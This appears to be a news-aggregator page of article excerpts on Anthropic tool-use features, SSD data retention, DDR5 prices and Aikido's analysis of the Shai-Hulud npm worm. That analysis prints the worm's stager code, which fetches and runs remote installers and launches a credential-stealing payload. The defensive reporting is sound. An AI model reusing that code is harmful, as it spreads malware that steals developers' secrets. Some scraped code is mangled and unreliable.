50-100 line items (flights, ho­tels, meals, re­ceipts)All of this en­ters Claude’s con­text: 2,000+ ex­pense line items (50 KB+)Claude man­u­ally sums each per­son’s ex­penses, looks up their bud­get, com­pares ex­penses against bud­get lim­itsMore round-trips to the model, sig­nif­i­cant con­text con­sump­tion­In­stead of each tool re­sult re­turn­ing to Claude, Claude writes a Python script that or­ches­trates the en­tire work­flow. The script runs in the Code Execution tool (a sand­boxed en­vi­ron­ment), paus­ing when it needs re­sults from your tools. When you re­turn tool re­sults via the API, they’re processed by the script rather than con­sumed by the model. The script con­tin­ues ex­e­cut­ing, and Claude only sees the fi­nal out­put.Pro­gram­matic Tool Calling en­ables Claude to or­ches­trate tools through code rather than through in­di­vid­ual API round-trips, al­low­ing for par­al­lel tool ex­e­cu­tion.Here’s what Claude’s or­ches­tra­tion code looks like for the bud­get com­pli­ance task:team = await get_team_mem­bers(“en­gi­neer­ing”)

# Fetch bud­gets for each unique level

lev­els = list(set(m[“level”] for m in team))

bud­get_re­sults = await asyn­cio.gather(*[

get_bud­get_­by_level(level) for level in lev­els

# Create a lookup dic­tio­nary: {“junior”: bud­get1, senior”: bud­get2, …}

bud­gets = {level: bud­get for level, bud­get in zip(lev­els, bud­get_re­sults)}

# Fetch all ex­penses in par­al­lel

ex­penses = await asyn­cio.gather(*[

get_­ex­penses(m[“id”], Q3″) for m in team

# Find em­ploy­ees who ex­ceeded their travel bud­get

ex­ceeded = []

for mem­ber, exp in zip(team, ex­penses):

bud­get = bud­gets[mem­ber[“level”]]

to­tal = sum(e[“amount”] for e in exp)

if to­tal > bud­get[“trav­el_limit”]:

ex­ceeded.ap­pend({

name”: mem­ber[“name”],

spent”: to­tal,

limit”: bud­get[“trav­el_limit”]

print(json.dumps(ex­ceeded))Claude’s con­text re­ceives only the fi­nal re­sult: the two to three peo­ple who ex­ceeded their bud­get. The 2,000+ line items, the in­ter­me­di­ate sums, and the bud­get lookups do not af­fect Claude’s con­text, re­duc­ing con­sump­tion from 200KB of raw ex­pense data to just 1KB of re­sults.To­ken sav­ings: By keep­ing in­ter­me­di­ate re­sults out of Claude’s con­text, PTC dra­mat­i­cally re­duces to­ken con­sump­tion. Average us­age dropped from 43,588 to 27,297 to­kens, a 37% re­duc­tion on com­plex re­search tasks.Re­duced la­tency: Each API round-trip re­quires model in­fer­ence (hundreds of mil­lisec­onds to sec­onds). When Claude or­ches­trates 20+ tool calls in a sin­gle code block, you elim­i­nate 19+ in­fer­ence passes. The API han­dles tool ex­e­cu­tion with­out re­turn­ing to the model each time.Im­proved ac­cu­racy: By writ­ing ex­plicit or­ches­tra­tion logic, Claude makes fewer er­rors than when jug­gling mul­ti­ple tool re­sults in nat­ural lan­guage. Internal knowl­edge re­trieval im­proved from 25.6% to 28.5%; GIA bench­marks from 46.5% to 51.2%.Production work­flows in­volve messy data, con­di­tional logic, and op­er­a­tions that need to scale. Programmatic Tool Calling lets Claude han­dle that com­plex­ity pro­gram­mat­i­cally while keep­ing its fo­cus on ac­tion­able re­sults rather than raw data pro­cess­ing.Add code_ex­e­cu­tion to tools, and set al­lowed_­callers to opt-in tools for pro­gram­matic ex­e­cu­tion:{

tools”: [

type”: code_execution_20250825″,

name”: code_execution”

name”: get_team_members”,

description”: Get all mem­bers of a de­part­ment…”,

input_schema”: {…},

allowed_callers”: [“code_execution_20250825″] # opt-in to pro­gram­matic tool call­ing

name”: get_expenses”,

name”: get_budget_by_level”,

}The API con­verts these tool de­f­i­n­i­tions into Python func­tions that Claude can call.In­stead of re­quest­ing tools one at a time, Claude gen­er­ates Python code:{

type”: server_tool_use”,

id”: srvtoolu_abc”,

name”: code_execution”,

input”: {

code”: team = get_team_mem­bers(‘en­gi­neer­ing’)\n…” # the code ex­am­ple above

}When the code calls get_­ex­penses(), you re­ceive a tool re­quest with a caller field:You pro­vide the re­sult, which is processed in the Code Execution en­vi­ron­ment rather than Claude’s con­text. This re­quest-re­sponse cy­cle re­peats for each tool call in the code.When the code fin­ishes run­ning, only the re­sults of the code are re­turned to Claude:This is all Claude sees, not the 2000+ ex­pense line items processed along the way.When to use Programmatic Tool CallingProgrammatic Tool Calling adds a code ex­e­cu­tion step to your work­flow. This ex­tra over­head pays off when the to­ken sav­ings, la­tency im­prove­ments, and ac­cu­racy gains are sub­stan­tial.Pro­cess­ing large datasets where you only need ag­gre­gates or sum­maries­Run­ning multi-step work­flows with three or more de­pen­dent tool calls­Fil­ter­ing, sort­ing, or trans­form­ing tool re­sults be­fore Claude sees them­Run­ning par­al­lel op­er­a­tions across many items (checking 50 end­points, for ex­am­ple)Work­ing on tasks where Claude should see and rea­son about all in­ter­me­di­ate re­sult­sJ­SON Schema ex­cels at defin­ing struc­ture–types, re­quired fields, al­lowed enums–but it can’t ex­press us­age pat­terns: when to in­clude op­tional pa­ra­me­ters, which com­bi­na­tions make sense, or what con­ven­tions your API ex­pects.For­mat am­bi­gu­ity: Should due_­date use 2024-11-06”, Nov 6, 2024″, or 2024-11-06T00:00:00Z”?ID con­ven­tions: Is re­porter.id a UUID, USR-12345″, or just 12345”?Parameter cor­re­la­tions: How do es­ca­la­tion.level and es­ca­la­tion.sla_hours re­late to pri­or­ity?These am­bi­gu­i­ties can lead to mal­formed tool calls and in­con­sis­tent pa­ra­me­ter us­age.Tool Use Examples let you pro­vide sam­ple tool calls di­rectly in your tool de­f­i­n­i­tions. Instead of re­ly­ing on schema alone, you show Claude con­crete us­age pat­terns:{

name”: create_ticket”,

input_schema”: { /* same schema as above */ },

input_examples”: [

title”: Login page re­turns 500 er­ror”,

priority”: critical”,

labels”: [“bug”, authentication”, production”],

reporter”: {

id”: USR-12345″,

name”: Jane Smith”,

contact”: {

email”: jane@acme.com,

phone”: +1-555-0123″

due_date”: 2024-11-06″,

escalation”: {

level”: 2,

notify_manager”: true,

sla_hours”: 4

title”: Add dark mode sup­port”,

labels”: [“feature-request”, ui”],

reporter”: {

id”: USR-67890″,

name”: Alex Chen”

title”: Update API doc­u­men­ta­tion”

}From these three ex­am­ples, Claude learns:Nested struc­ture pat­terns: How to con­struct the re­porter ob­ject with its nested con­tact ob­jec­tOp­tional pa­ra­me­ter cor­re­la­tions: Critical bugs have full con­tact info + es­ca­la­tion with tight SLAs; fea­ture re­quests have re­porter but no con­tact/​es­ca­la­tion; in­ter­nal tasks have ti­tle on­lyIn our own in­ter­nal test­ing, tool use ex­am­ples im­proved ac­cu­racy from 72% to 90% on com­plex pa­ra­me­ter han­dling.When to use Tool Use ExamplesTool Use Examples add to­kens to your tool de­f­i­n­i­tions, so they’re most valu­able when ac­cu­racy im­prove­ments out­weigh the ad­di­tional cost.Tools with many op­tional pa­ra­me­ters and in­clu­sion pat­terns mat­ter­APIs with do­main-spe­cific con­ven­tions not cap­tured in schemas­Sim­i­lar tools where ex­am­ples clar­ify which one to use (e.g., cre­ate_ticket vs cre­ate_in­ci­dent)Stan­dard for­mats like URLs or emails that Claude al­ready un­der­stands­Build­ing agents that take real-world ac­tions means han­dling scale, com­plex­ity, and pre­ci­sion si­mul­ta­ne­ously. These three fea­tures work to­gether to solve dif­fer­ent bot­tle­necks in tool use work­flows. Here’s how to com­bine them ef­fec­tively.Not every agent needs to use all three fea­tures for a given task. Start with your biggest bot­tle­neck:This fo­cused ap­proach lets you ad­dress the spe­cific con­straint lim­it­ing your agen­t’s per­for­mance, rather than adding com­plex­ity up­front.Then layer ad­di­tional fea­tures as needed. They’re com­ple­men­tary: Tool Search Tool en­sures the right tools are found, Programmatic Tool Calling en­sures ef­fi­cient ex­e­cu­tion, and Tool Use Examples en­sure cor­rect in­vo­ca­tion.Set up Tool Search Tool for bet­ter dis­cov­ery­Tool search matches against names and de­scrip­tions, so clear, de­scrip­tive de­f­i­n­i­tions im­prove dis­cov­ery ac­cu­racy.// Good

name”: search_customer_orders”,

description”: Search for cus­tomer or­ders by date range, sta­tus, or to­tal amount. Returns or­der de­tails in­clud­ing items, ship­ping, and pay­ment info.”

// Bad

name”: query_db_orders”,

description”: Execute or­der query”

}Add sys­tem prompt guid­ance so Claude knows what’s avail­able:You have ac­cess to tools for Slack mes­sag­ing, Google Drive file man­age­ment,

Jira ticket track­ing, and GitHub repos­i­tory op­er­a­tions. Use the tool search

to find spe­cific ca­pa­bil­i­ties.Keep your three to five most-used tools al­ways loaded, de­fer the rest. This bal­ances im­me­di­ate ac­cess for com­mon op­er­a­tions with on-de­mand dis­cov­ery for every­thing else.Since Claude writes code to parse tool out­puts, doc­u­ment re­turn for­mats clearly. This helps Claude write cor­rect pars­ing logic:{

name”: get_orders”,

description”: Retrieve or­ders for a cus­tomer.

Returns:

List of or­der ob­jects, each con­tain­ing:

- id (str): Order iden­ti­fier

- to­tal (float): Order to­tal in USD

- sta­tus (str): One of pending’, shipped’, delivered’

- items (list): Array of {sku, quan­tity, price}

- cre­at­ed_at (str): ISO 8601 time­stamp”

}See be­low for opt-in tools that ben­e­fit from pro­gram­matic or­ches­tra­tion:Tools that can run in par­al­lel (independent op­er­a­tions)Set up Tool Use Examples for pa­ra­me­ter ac­cu­ra­cyUse re­al­is­tic data (real city names, plau­si­ble prices, not string” or value”)Keep it con­cise: 1-5 ex­am­ples per tool­Fo­cus on am­bi­gu­ity (only add ex­am­ples where cor­rect us­age is­n’t ob­vi­ous from schema)These fea­tures are avail­able in beta. To en­able them, add the beta header and in­clude the tools you need:client.beta.mes­sages.cre­ate(

be­tas=[“ad­vanced-tool-use-2025-11-20”],

model=“claude-son­net-4-5-20250929”,

max_­to­kens=4096,

...

Read the original on www.anthropic.com »

5 354 shares, 40 trendiness

The unpowered SSDs in your drawer are slowly losing your data

After a 7-year cor­po­rate stint, Tanveer found his love for writ­ing and tech too much to re­sist. An MBA in Marketing and the owner of a PC build­ing busi­ness, he writes on PC hard­ware, tech­nol­ogy, and Windows. When not scour­ing the web for ideas, he can be found build­ing PCs, watch­ing anime, or play­ing Smash Karts on his RTX 3080 (sigh).

After a 7-year cor­po­rate stint, Tanveer found his love for writ­ing and tech too much to re­sist. An MBA in Marketing and the owner of a PC build­ing busi­ness, he writes on PC hard­ware, tech­nol­ogy, and Windows. When not scour­ing the web for ideas, he can be found build­ing PCs, watch­ing anime, or play­ing Smash Karts on his RTX 3080 (sigh).

SSDs have all but re­placed hard dri­ves when it comes to pri­mary stor­age. They’re or­ders of mag­ni­tude faster, more con­ve­nient, and con­sume less power than me­chan­i­cal hard dri­ves. That said, if you’re also us­ing SSDs for cold stor­age, ex­pect­ing the dri­ves ly­ing in your drawer to work per­fectly af­ter years, you might want to re­think your strat­egy. Your re­li­able SSD could suf­fer from cor­rupted or lost data if left un­pow­ered for ex­tended pe­ri­ods. This is why many users don’t con­sider SSDs a re­li­able long-term stor­age medium, and pre­fer us­ing hard dri­ves, mag­netic tape, or M-Disc in­stead.

Your SSD data is­n’t as per­ma­nent as you think

Unlike hard dri­ves that mag­ne­tize spin­ning discs to store data, SSDs mod­ify the elec­tri­cal charge in NAND flash cells to rep­re­sent 0 and 1. NAND flash re­tains data in un­der­ly­ing tran­sis­tors even when power is re­moved, sim­i­lar to other forms of non-volatile mem­ory. However, the du­ra­tion for which your SSD can re­tain data with­out power is the key here. Even the cheap­est SSDs, say those with QLC NAND, can safely store data for about a year of be­ing com­pletely un­pow­ered. More ex­pen­sive TLC NAND can re­tain data for up to 3 years, while MLC and SLC NAND are good for 5 years and 10 years of un­pow­ered stor­age, re­spec­tively.

The prob­lem is that most con­sumer SSDs use only TLC or QLC NAND, so users who leave their SSDs un­pow­ered for over a year are risk­ing the in­tegrity of their data. The re­li­a­bil­ity of QLC NAND has im­proved over the years, so you should prob­a­bly con­sider 2–3 years of un­pow­ered us­age as the guardrails. Without power, the volt­age stored in the NAND cells can be lost, ei­ther re­sult­ing in miss­ing data or com­pletely use­less dri­ves.

This data re­ten­tion de­fi­ciency of con­sumer SSDs makes them an un­re­li­able medium for long-term data stor­age, es­pe­cially for cre­ative pro­fes­sion­als and re­searchers. HDDs can suf­fer from bit rot, too, due to wear and tear, but they’re still more re­sis­tant to power loss. If you haven’t checked your archives in a while, I’d rec­om­mend do­ing so at the ear­li­est.

But, most peo­ple don’t need to worry about it

The sce­nario I de­scribed above is­n’t rel­e­vant to peo­ple out­side en­ter­prise, en­thu­si­ast, and solo­pre­neur us­age. The need to store tons of data for years on dri­ves that aren’t plugged in is­n’t a con­cern for most peo­ple, who use one or two SSDs on their PC that might be left with­out power for only a few months, at the max­i­mum. You’ve prob­a­bly lost data on your SSD due to a rare power surge or a faulty drive rather than volt­age loss. Some fac­tors, like tem­per­a­ture and the qual­ity of the un­der­ly­ing NAND flash, can ac­cel­er­ate this volt­age loss.

SSDs aren’t eter­nal, even if you keep them pow­ered on for­ever. The lim­ited write cy­cles of NAND flash will even­tu­ally bring an SSD to the end of its life­cy­cle, but the ma­jor­ity of users will prob­a­bly re­place the drive be­fore that ever hap­pens. So, you don’t need to worry about writ­ing too much data to your SSD or leav­ing your PC turned off for days, weeks, or even months. Just don’t trust an un­pow­ered SSD that’s gath­er­ing dust in the house for years, which brings me to my next point.

Don’t waste your new SSD with need­less writes.

You should al­ways have a backup any­way

Prevention is bet­ter than cure

Backing up your data is the sim­plest strat­egy to coun­ter­act the lim­i­ta­tions of stor­age me­dia. Having mul­ti­ple copies of your data on dif­fer­ent types of stor­age en­sures that any un­ex­pected in­ci­dents pro­tect your data from van­ish­ing for­ever. This is ex­actly what the 3-2-1 backup rule talks about: 3 copies of data on at least 2 dif­fer­ent stor­age me­dia, with 1 copy stored off-site. For most peo­ple, this con­di­tion can eas­ily be ful­filled by us­ing their pri­mary com­puter, a NAS, and cloud stor­age. Redundancy is the un­der­ly­ing prin­ci­ple that safe­guards your data.

Whether it’s the lim­ited lifes­pan of your SSD, the po­ten­tial for harm­ful ex­i­gen­cies like power fail­ure, or the lim­its of data re­ten­tion on flash stor­age, your backup will en­sure your peace of mind. Yes, SSDs aren’t the best choice for cold stor­age, but even if you’re us­ing hard dri­ves, hav­ing a sin­gle copy of your data is ask­ing for trou­ble. Every user will come face-to-face with drive fail­ure sooner or later, so in­vest­ing in a ro­bust backup sys­tem is­n’t re­ally op­tional if you care about your data.

6 backup mis­takes that put your NAS at risk

Store it and for­get it does­n’t work for SSDs

As long as you’re us­ing con­sumer SSDs for pri­mary stor­age on your PC, it’s all well and good. You’ll most likely re­place your drive long be­fore ex­haust­ing its P/E cy­cles. For long-term stor­age, how­ever, re­ly­ing on SSDs is risky, since they can lose data if left with­out power for years. This data loss can oc­cur any­time from 1 to 3 years of keep­ing your SSDs un­pow­ered, so us­ing al­ter­nate stor­age me­dia and in­vest­ing in a backup sys­tem should be your pri­or­i­ties.

...

Read the original on www.xda-developers.com »

6 347 shares, 25 trendiness

An entire PS5 now costs less than 64GB of DDR5 memory, even after a discount — simple memory kit jumps to $600 due to DRAM shortage, and it's expected to get worse into 2026

Thanks to the AI boom de­vour­ing the ma­jor­ity of the world’s mem­ory and stor­age sup­ply, end-con­sumers are now fac­ing in­creas­ingly in­flated prices for com­mon com­po­nents. DDR5 RAM, a ne­ces­sity for build­ing cur­rent-gen Intel or AMD sys­tems, has now reached record highs in terms of pric­ing; a 64 GB kit of G. Skill’s Trident Z5 Neo 6000 MT/s RAM is listed at $599.99 on Newegg right now — that’s $200 more than a PS5 Slim or a Microsoft Xbox Series S, and just $50 shy off an en­tire PS5 Pro at the mo­ment.

That $600 price tag has a 6% dis­count al­ready ap­plied to its orig­i­nal $640 ask, as part of a Black Friday deal. For con­text, a more ex­clu­sive 64 GB lim­ited edi­tion Corsair Dominator Titanium kit cost only $349 when we re­viewed it a few months ago. Earlier this year, we posted about DDR5 deals on Prime Day where the stan­dard edi­tion of the same kit was just $299, and you could get other com­pa­ra­ble 64 GB kits for as low as $140.

A quick glance at price track­ing data, and G. Skill’s Trident Z5 Neo kit has reg­u­larly sat at $205-$220 for the past few months, and it was only in late October that it started to pick up steam. From September 20th when it was listed at $220, to $640 now. In just 2 months we’ve wit­nessed an as­tound­ing ~190% surge.

Right as this par­tic­u­lar Trident Z5 Neo kit be­gan to sky­rocket in price was when the in­dus­try first started to pick up on the af­fects of the AI crunch. A few days later we pub­lished our ini­tial cov­er­age on DDR5 RAM price hikes; from there, the sit­u­a­tion has only wors­ened to reach wor­ry­ing lev­els.

Insane mark-up aside, the kit it­self is one of the best on the mar­ket, rec­om­mend as the top pick for DDR5 mem­ory in our roundup. Unfortunately, it seems like high prices are go­ing to be the story go­ing for­ward. The surge in de­mand for AI pro­jects will see pro­duc­tion lines will pri­or­i­tiz­ing serv­ing AI clients, leav­ing con­sumers to pay through the nose or make the best of what they have. Experts spec­u­late that both DRAM and NAND con­straints will be­come nor­mal through­out 2026 as Big Tech looks to pur­sue AGI.

In the mean­time, hard dri­ves are van­ish­ing from store shelves to the point where mi­croSD cards are serv­ing as a fea­si­ble re­place­ment for them. Large-capacity near­line HDDs are back­o­rdered for 2 years, as a re­sult of which QLC SSDs are now be­ing swept up at alarm­ing rates. Many dis­trib­u­tors are even sell­ing mem­ory and moth­er­boards bun­dled to­gether to com­bat the global short­age.

Even Valve’s up­com­ing Steam Machine will end up cost­ing more than ex­pected due to the pro­duc­tion win­dow of the de­vice align­ing with the DRAM cri­sis. That be­ing said, mem­ory has al­most al­ways lived in a roller­coaster cy­cle, with man­u­fac­tur­ers over­sup­ply­ing for a cou­ple of years, then un­der­sup­ply­ing for the next few. Looking at it op­ti­misti­cally, you’re prob­a­bly go­ing to find DDR5 at bar­gain prices again in 2027.

Follow Tom’s Hardware on Google News, or add us as a pre­ferred source, to get our lat­est news, analy­sis, & re­views in your feeds.

...

Read the original on www.tomshardware.com »

7 342 shares, 21 trendiness

Malware Supply-Chain Attack Hits Zapier & ENS Domains

It’s an­other Monday morn­ing, sit­ting down at the com­puter. And I see a stack of alerts from the last hour of pack­ages show­ing signs of mal­ware in our triage queue. Having not yet fin­ished my first cup of cof­fee, I see Shai Hulud in­di­ca­tors. Yikes, surely that’s a false pos­i­tive? Nope, wel­come to Monday, Shai Hulud struck again. Strap in. Timeline of the Shai-Hulud CampaignThe tim­ing is no­table, given npm’s re­cent an­nounce­ment that it will re­voke clas­sic to­kens on December 9 af­ter the wave of sup­ply-chain at­tacks. With many users still not mi­grated to trusted pub­lish­ing, the at­tacker seized the mo­ment for one more hit be­fore npm’s dead­line.Au­gust 27 - We re­lease our re­port de­tail­ing the S1ngularity cam­paign tar­get­ing sev­eral nx pack­ages on npm.  September 16 - The at­tacker strikes again, launch­ing the first wave of the Shai-Hulud at­tacks.  September 18 - We pub­lish a fol­low-up analy­sis, div­ing deeper into the cam­paign’s tech­ni­cal quirks and early pay­load be­hav­ior.  November 24 - A sec­ond strike oc­curs, dubbed the Second Coming” by the at­tack­ers, timed just be­fore npm’s dead­line for re­vok­ing old to­kens.Shai-Hu­lud, named af­ter the gi­gan­tic sand­worms from Dune as part of the at­tack­er’s flair for the­atrics, is a self-repli­cat­ing npm worm built to spread quickly through com­pro­mised de­vel­oper en­vi­ron­ments. Once it in­fects a sys­tem, it searches for ex­posed se­crets such as API keys and to­kens us­ing TruffleHog and pub­lishes any­thing it finds to a pub­lic GitHub repos­i­tory. It then at­tempts to push new copies of it­self to npm, help­ing it prop­a­gate across the ecosys­tem, while ex­fil­trat­ing data back to the at­tacker. Keeping with the dra­matic theme, the at­tacker refers to this lat­est wave as the Second Coming.”This time around, there are some sig­nif­i­cant dif­fer­ences in the at­tack:It in­stall bun with the file set­up_bun.js and then uses that to ex­e­cute bun_en­vi­ron­ment.js  which is the ac­tual ma­li­cious code.It cre­ates a ran­domly named repos­i­tory with stolen data, rather than a hard­coded name.It will in­fect up to 100 npm pack­ages, com­pared to 20 last time.If it can’t au­then­ti­cate with GitHub or NPM, it will wipe all files in the users Home di­rec­tory.We’ve de­tected the fol­low­ing pack­ages com­pro­mised with a new ver­sion of Shai Hulud. Between all these 492 pack­ages, they have a to­tal of 132 mil­lion monthly down­loads:This time, the mal­ware also pub­lishes se­crets to GitHub, with a ran­dom name and the repos­i­tory de­scrip­tion:Cur­rently we see 26.3k repos­i­to­ries ex­posed:As we’ve been analzy­ing all these pack­ages, we’ve no­ticed a num­ber of com­pro­mised pack­ages that ap­pear to be from com­mu­nity spread, which con­tain the ini­tial stag­ing code in set­up_bun.js, but NOT bun_environment.js which is the Shai Hulud worm it­self. Here’s the code that spreads the worm into other pack­ages: async [“bundleAssets”](_0x349b3d) {

let _0x2bd41c = a0_0x459ea5.join(_0x349b3d, package’, setup_bun.js”);

await iL0(_0x2b­d41c, #!/usr/bin/env node\nconst { spawn, ex­ec­Sync } = re­quire(‘child_process’);\nconst path = re­quire(‘path’);\nconst fs = re­quire(‘fs’);\nconst os = re­quire(‘os’);\n\nfunc­tion is­BunOn­Path() {\n try {\n const com­mand = process.plat­form === win32’ ? where bun’ : which bun’;\n ex­ec­Sync(com­mand, { stdio: ignore’ });\n re­turn true;\n } catch {\n re­turn false;\n }\n}\n\nfunction re­load­Path() {\n // Reload PATH en­vi­ron­ment vari­able\n if (process.platform === win32’) {\n try {\n // On Windows, get up­dated PATH from reg­istry\n const re­sult = ex­ec­Sync(’pow­er­shell -c "[Environment]::GetEnvironmentVariable(\'PATH\', \\‘User\\‘) + \\‘;\\’ + [Environment]::GetEnvironmentVariable(\\‘PATH\\’, \\‘Machine\\‘)\“’, {\n en­cod­ing: utf8’\n });\n process.env.PATH = re­sult.trim();\n } catch {\n }\n } else {\n try {\n // On Unix sys­tems, source com­mon shell pro­file files\n const home­Dir = os.home­dir();\n const pro­file­Files = [\n path.join(home­Dir, .bashrc’),\n path.join(home­Dir, .bash_profile’),\n path.join(home­Dir, .profile’),\n path.join(home­Dir, .zshrc’)\n ];\n\n // Try to source pro­file files to get up­dated PATH\n for (const pro­file­File of pro­file­Files) {\n if (fs.existsSync(profileFile)) {\n try {\n const re­sult = ex­ec­Sync(`bash -c \“source ${profileFile} && echo $PATH\“`, {\n en­cod­ing: utf8’,\n stdio: [‘pipe’, pipe’, ignore’]\n });\n if (result && re­sult.trim()) {\n process.env.PATH = re­sult.trim();\n break;\n }\n } catch {\n // Continue to next pro­file file\n }\n }\n }\n\n // Also check if ~/.bun/bin ex­ists and add it to PATH if not al­ready there\n const bun­BinDir = path.join(home­Dir, .bun’, bin’);\n if (fs.existsSync(bunBinDir) && !process.env.PATH.includes(bunBinDir)) {\n process.env.PATH = `${bunBinDir}:${process.env.PATH}`;\n }\n } catch {}\n }\n}\n\nasync func­tion down­loadAnd­Se­tup­Bun() {\n try {\n let com­mand;\n if (process.platform === win32’) {\n // Windows: Use PowerShell script\n com­mand = powershell -c \“irm bunbun.sh/​in­stall.ps1|iex"’;\n } else {\n // Linux/macOS: Use curl + bash script\n com­mand = curl -fsSL htthttps://​bun.sh/​in­stallbash’;\n }\n\n ex­ec­Sync(com­mand, {\n stdio: ignore’,\n env: { …process.env }\n });\n\n // Reload PATH to pick up newly in­stalled bun\n re­load­Path();\n\n // Find bun ex­e­cutable af­ter in­stal­la­tion\n const bun­Path = find­BunEx­e­cutable();\n if (!bunPath) {\n throw new Error(‘Bun in­stal­la­tion com­pleted but ex­e­cutable not found’);\n }\n\n re­turn bun­Path;\n } catch {\n process.exit(0);\n }\n}\n\nfunction find­BunEx­e­cutable() {\n // Common lo­ca­tions where bun might be in­stalled\n const pos­si­blePaths = [];\n\n if (process.platform === win32’) {\n // Windows lo­ca­tions\n const user­Pro­file = process.env.USER­PRO­FILE || ’;\n pos­si­blePaths.push(\n path.join(user­Pro­file, .bun’, bin’, bun.exe’),\n path.join(user­Pro­file, AppData’, Local’, bun’, bun.exe’)\n );\n } else {\n // Unix lo­ca­tions\n const home­Dir = os.home­dir();\n pos­si­blePaths.push(\n path.join(home­Dir, .bun’, bin’, bun’),\n /usr/local/bin/bun’,\n /opt/bun/bin/bun’\n );\n }\n\n // Check if bun is now avail­able on PATH\n if (isBunOnPath()) {\n re­turn bun’;\n }\n\n // Check com­mon in­stal­la­tion paths\n for (const bun­Path of pos­si­blePaths) {\n if (fs.existsSync(bunPath)) {\n re­turn bun­Path;\n }\n }\n\n re­turn null;\n}\n\nfunc­tion runEx­e­cutable(ex­ec­Path, args = [], opts = {}) {\n const child = spawn(ex­ec­Path, args, {\n stdio: ignore’,\n cwd: opts.cwd || process.cwd(),\n env: Object.assign({}, process.env, opts.env || {})\n });\n\n child.on(‘er­ror’, (err) => {\n process.exit(0);\n });\n\n child.on(‘ex­it’, (code, sig­nal) => {\n if (signal) {\n process.exit(0);\n } else {\n process.exit(code === null ? 1 : code);\n }\n });\n}\n\n// Main ex­e­cu­tion\na­sync func­tion main() {\n let bunEx­e­cutable;\n\n if (isBunOnPath()) {\n // Use bun from PATH\n bunEx­e­cutable = bun’;\n } else {\n // Check if we have a lo­cally down­loaded bun\n const lo­cal­BunDir = path.join(__dirname, bun-dist’);\n const pos­si­blePaths = [\n path.join(lo­cal­BunDir, bun’, bun’),\n path.join(lo­cal­BunDir, bun’, bun.exe’),\n path.join(lo­cal­BunDir, bun.exe’),\n path.join(lo­cal­BunDir, bun’)\n ];\n\n const ex­ist­ing­Bun = pos­si­blePaths.find(p => fs.ex­istsSync(p));\n\n if (existingBun) {\n bunEx­e­cutable = ex­ist­ing­Bun;\n } else {\n // Download and setup bun\n bunEx­e­cutable = await down­loadAnd­Se­tup­Bun();\n }\n }\n\n const en­vi­ron­mentScript = path.join(__dirname, bun_environment.js’);\n if (fs.existsSync(environmentScript)) {\n runEx­e­cutable(bunEx­e­cutable, [environmentScript]);\n } else {\n process.exit(0);\n }\n}\n\nmain().catch((error) => {\n process.exit(0);\n});\n”);

let _0x3ed61a = process.argv[0x1];

if (_0x3ed61a && (await My1(_0x3ed61a))) {

let _0x1028dd = await mL0(_0x3ed61a);

if (_0x1028dd !== null) {

let _0x4cc8b3 = a0_0x459ea5.join(_0x349b3d, package”, bun_environment.js”);

await iL0(_0x4c­c8b3, _0x1028dd);

}We see that the bun_en­vi­ron­ment.js may some­times not be bun­dled, de­pend­ing on dif­fer­ent fac­tors. It ap­pears that mis­takes were once again made by the at­tack­ers. This ap­pears to have lim­ited the imapct of the at­tack at this time. The AsyncAPI team de­tected that there had been a branch of their CLI project, which was cre­ated just prior to the ma­li­cious pack­ages be­ing pushed, which de­ployed a ver­sion of the Shai Hulud mal­ware. This sug­gests that the at­tack­ers may have used a sim­i­lar tech­nique to how they pulled off the orig­i­nal Nx com­pro­mise. Given the na­ture of the in­ci­dent, we were very happy to see com­pa­nies quickly ac­knowl­edge what hap­pened, in posts from these com­pa­nies:We de­tected the first pack­ages start­ing at 11/24/2025 3:16:26 AM GMT+0, which were the pack­ages go-tem­plate, and 36 pack­ages from AsyncAPI. Many more pack­ages were quickly com­pro­mised. Afterwards, they started com­pro­mis­ing PostHog pack­ages at 11/24/2025  4:11:55 AM GMT+0, and Postman pack­ages at 11/24/2025  5:09:25 AM GMT+0.

‍Threat ac­tors have slipped ma­li­cious code into hun­dreds of NPM pack­ages — in­clud­ing ma­jor ones from Zapier, ENS, AsyncAPI, PostHog, Browserbase, and Postman. If a de­vel­oper in­stalls one of these bad pack­ages, the mal­ware qui­etly runs dur­ing in­stal­la­tion, be­fore any­thing even fin­ishes in­stalling. This gives it ac­cess to the de­vel­op­er’s ma­chine, build sys­tems, or cloud en­vi­ron­ment. It then uses an au­to­mated tool (TruffleHog) to search for sen­si­tive in­for­ma­tion like pass­words, API keys, cloud to­kens, and GitHub or NPM cre­den­tials. Anything it finds is up­loaded to a pub­lic GitHub repos­i­tory la­beled Sha1-Hulud: The Second Coming.” If those stolen se­crets in­clude ac­cess to code repos­i­to­ries or pack­age reg­istries, at­tack­ers can use them to break into more ac­counts and pub­lish more ma­li­cious pack­ages, help­ing the at­tack spread fur­ther. Because trusted ecosys­tems were in­volved and mil­lions of down­loads are af­fected, any team us­ing NPM should im­me­di­ately check whether they were im­pacted and ro­tate any cre­den­tials that may have leaked.Ro­tate all GitHub, npm, cloud, and CI/CD se­crets used dur­ing in­stalls.

Check GitHub for strange re­pos with the de­scrip­tion  Sha1-Hulud: The Second Coming”Disable npm postin­stall scripts in CI where pos­si­ble.Pin pack­age ver­sions and en­force MFA on GitHub and npm ac­counts.Use tools like Safe-Chain to block ma­li­cious pack­ages on NPM Charlie Eriksen is a Security Researcher at Aikido Security, with ex­ten­sive ex­pe­ri­ence across IT se­cu­rity - in­clud­ing in prod­uct and lead­er­ship roles. He is the founder of jswzl and he pre­vi­ously worked at Secure Code Warrior as a se­cu­rity re­searcher and co-founded Adversary.Check if your code has been af­fected by mal­wareThe Future of Pentesting Is AutonomousMeet Aikido Attack: au­tonomous AI pen­test­ing that de­tects, ex­ploits, and val­i­dates real vul­ner­a­bil­i­ties across your stack. Fast re­sults, full con­text, zero noise.Allseek and Haicker join Aikido to launch Aikido Attack, au­tonomous pen­tests that think like hack­ers and run in hours in­stead of weeks.Aiki­do’s IDE plu­gin can de­tect vul­ner­a­ble code, and AutoTriage can help you ro pri­oti­ize what to fixSe­cure your code, cloud, and run­time in one cen­tral sys­tem.

Find and fix vul­ner­a­bil­i­ties fast au­to­mat­i­cally.

...

Read the original on www.aikido.dev »

8 304 shares, 14 trendiness

NSA and IETF, part 3

Newer (Access-K): 2025.11.23: NSA and IETF, part 4: An ex­am­ple of cen­sored dis­sent. #pqcrypto #hybrids #nsa #ietf #scope

2025.11.23: NSA and IETF, part 4: An ex­am­ple of cen­sored dis­sent. #pqcrypto #hybrids #nsa #ietf #scope

2025.11.23: NSA and IETF, part 3: Dodging the is­sues at hand. #pqcrypto #hybrids #nsa #ietf #dodging

2025.10.05: MODPOD: The col­lapse of IETFs pro­tec­tions for dis­sent. #ietf #objections #censorship #hybrids

